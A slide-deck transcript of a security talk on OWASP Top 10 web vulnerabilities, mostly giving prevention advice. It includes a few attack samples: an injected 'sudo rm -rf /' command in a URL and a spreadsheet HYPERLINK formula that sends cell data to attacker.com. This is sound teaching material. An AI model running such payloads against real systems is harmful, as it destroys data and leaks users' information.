The document discusses common web application vulnerabilities and how to defend against them. It begins by introducing the presenter and their background in security research. It then covers the OWASP Top 10 list of vulnerabilities like injection, broken authentication, cross-site scripting, insecure direct object references, security misconfiguration, sensitive data exposure, missing access controls, cross-site request forgery, use of outdated components, and unvalidated redirects. For each vulnerability, it provides examples of exploits, impacts, and recommendations for prevention and mitigation. It concludes with a demonstration of remote code execution and a question and answer section.

1. Let’s talk Security
Understanding, Exploiting and Defending against Top Web
Vulnerabilities
Dheeraj Joshi
djadmin.in

2. About Me
I find security vulnerabilities for fun
& swag and I wear White Hat.
Uber, CKEditor, Dropbox,
MailChimp, InVision, DigitalOcean,
CloudFare, Intuit, Groupon, etc.
What makes me happy?

3. Security - Into The Details
● Owasp’s Top 10 Vulnerabilities
○ Explain
○ Impact
○ Defense
○ Real examples (External + Internal)
● Demo - RCE
● Q & A

4. Why should Startups
Care about Security?
Startups & SMEs are impromptu
for cutting corners. One of the
first things they cut is ‘Security'.

6. HACKER PUTS HOSTING SERVICE CODE
SPACES OUT OF BUSINESS
The Shutdown

7. OWASP Top 10 And Beyond

8. INJECTION

9. PREVENT INJECTION
● For databases use prepared statements
● Whitelist inputs wherever possible
● Sanitize inputs (use filter extension)
● Don’t trust user input and always verify!

10. Example
Google Command Injection
We can include any command in the URL below
https://console.cloud.google.com/home/dashboard?
project=;sudo rm -rf /
Found by an Indian Security Researcher (S. Venkatesh)

11. Exploiting ‘Export as CSV’ functionality
Formula
Injection
=HYPERLINK("http://attacker.com?leak="&A1&A2,"Error: please
click for further information")
Fix - Append a single quote (‘) to the list of formula triggers ( =, +, -)
If victim clicks this cell, they will inadvertently exfiltrate the contents of
cells A1 and A2 to attacker website, which may include other users’
sensitive information.

12. BROKEN AUTHENTICATION AND SESSION
MANAGEMENT

13. MITIGATION
● Enforce strong password policy
● Require periodic reset of password
● Use 2 factor authentication
● Use SSL and secure flag on cookies
● Don’t neglect failed-login detection & tracking
● Only use httpOnly cookies

14. CROSS SITE SCRIPTING - XSS
● XSS attack users
● “Javascript Injection”
● Exploits can be bad,
really bad..

15. What is XSS?
Typical Reflected XSS

16. Stored XSS

17. DOM XSS

18. Protect Yourself
● Use filter extension to filter
inputs
● Ensure that outputs are HTML
encoded
● Don’t reinvent the wheel
● Don’t consider any part of the
request as being “safe”

19. ngBind attribute
$sanitize - service in module ngSanitize
Sanitizes an html string by stripping all potentially dangerous tokens.

20. INSECURE DIRECT OBJECT
REFERENCES

21. Scenario / Exploit
1) First, an attacker signup for an account and request ”forgot
password”.
2) You will receive a link :
https://vimeo.com/forgot_password/[user id]/[token]

22. Prevention
● Low level access controls
● Prevent user input in file/URL access
commands
● No unsanitized input to execution
commands

23. SECURITY
MISCONFIGURATION

24. PREVENTION > CURE
● Perform periodic security checks using
automated tools
● Static Code Analysis
● Example : Hardening MySQL, Directory
Listing, Auth Tokens

25. SENSITIVE DATA EXPOSURE
● Exposed PHP error messages
● Unencrypted sensitive data storage
● Not using SSL
● Example: a sensitive token should not be
sent to external websites (Fitbit)

26. MISSING FUNCTION LEVEL ACCESS CONTROL
● Valid input processing without access
controls
● Decentralized access control layer
● Example : Profile email address not
validated (Github), S3 configuration

27. ● Don’t perform data changes on
GET
● Use secure (csrf) tokens for
POST
● Impact : Real bad, attack users
● Example : Dropbox,
CodeSchool
CROSS-SITE REQUEST
FORGERY (CSRF)

28. ● Not keeping libraries up-to-date
● *cough*Wordpress*cough*
● Example : Third-Party Libraries (Apache CXF
Authentication Bypass, Spring RCE)
USING COMPONENTS WITH
KNOWN VULNERABILITIES

29. UNVALIDATED REDIRECTS AND
FORWARDS
● Header Injection
● JavaScript Parameter Injection
● Reliance on HTTP_REFERER
● Abuse window opener
(Facebook)

30. Example : Dropbox Open Redirect in v1 API

31. Remote Code Execution

32. The solution
● Reset all passwords and
keys
● Remove backdoors (not
easy)
OR
Destroy everything??

33. Thank you
References :
● https://www.owasp.org
● https://djadmin.in/pwn/ (tools)